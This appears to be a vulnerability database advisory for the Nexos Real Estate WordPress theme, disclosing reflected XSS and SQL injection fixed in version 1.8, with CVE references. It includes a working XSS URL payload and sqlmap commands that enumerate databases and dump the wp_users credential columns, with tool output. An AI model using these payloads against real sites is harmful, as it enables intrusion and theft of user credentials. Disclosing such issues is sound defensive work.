Lucene search
VLΛD VΞCTORWPEX-ID:80E462CA-41F9-4805-BB85-449F2045CFBBHistoryJun 28, 2020 - 12:00 a.m.
Nexos - Real Estate < 1.8 - Unauthenticated Reflected XSS & SQL Injection
2020-06-2800:00:00
VLΛD VΞCTOR
32
EPSS
0.044
Percentile
92.4%
Unauthenticated Reflected XSS and SQL Injection vulnerabilities were discovered in the «Nexos - Real Estate WordPress Theme», tested version — v1.7. June 17th, 2020 - Confirmed & Escalated to Envato. June 19th, 2020 - v1.8 released. Fixing the issues.
### PoC Unauthenticated Reflected XSS:
https://example.com/nexos-wp/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`XSS`)>
### PoC SQL Injection:
[!] sqlmap --url="https://example.com/nexos-wp/side-map/?search_order=idlisting%20DESC" --dbs --random-agent --threads 4
[02:23:33] [INFO] the back-end DBMS is MySQL
[02:23:33] [INFO] fetching database names
[02:23:33] [INFO] fetching number of databases
[02:23:33] [INFO] resumed: 2
available databases [2]:
[*] xx_nexos
[*] information_schema
[!] sqlmap --url="https://example.com/nexos-wp/side-map/?search_order=idlisting%20DESC" -D xx_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8
Database: xx_nexos
Table: wp_users
[9 entries]
[REDACTED]Related
zdt
zdt
exploitdb
exploitdb
packetstorm
packetstorm
WordPress NexosReal Estate Theme 1.7 Cross Site Scripting / SQL Injection
2020-07-22 00:00:00
wpvulndb
wpvulndb
Nexos - Real Estate < 1.8 - Unauthenticated Reflected XSS & SQL Injection
2020-06-28 00:00:00
cvelist
cvelist
CVE-2020-15364
2020-06-28 11:47:57
CVE-2020-15363
2020-06-28 11:48:06
cve
cve
CVE-2020-15363
2020-06-28 12:15:12
CVE-2020-15364
2020-06-28 12:15:12
nvd
nvd
CVE-2020-15364
2020-06-28 12:15:12
CVE-2020-15363
2020-06-28 12:15:12
prion
prion
Sql injection
2020-06-28 12:15:00
Cross site scripting
2020-06-28 12:15:00
dsquare
dsquare
WordPress Theme Nexos Real Estate SQL Injection
2020-08-05 00:00:00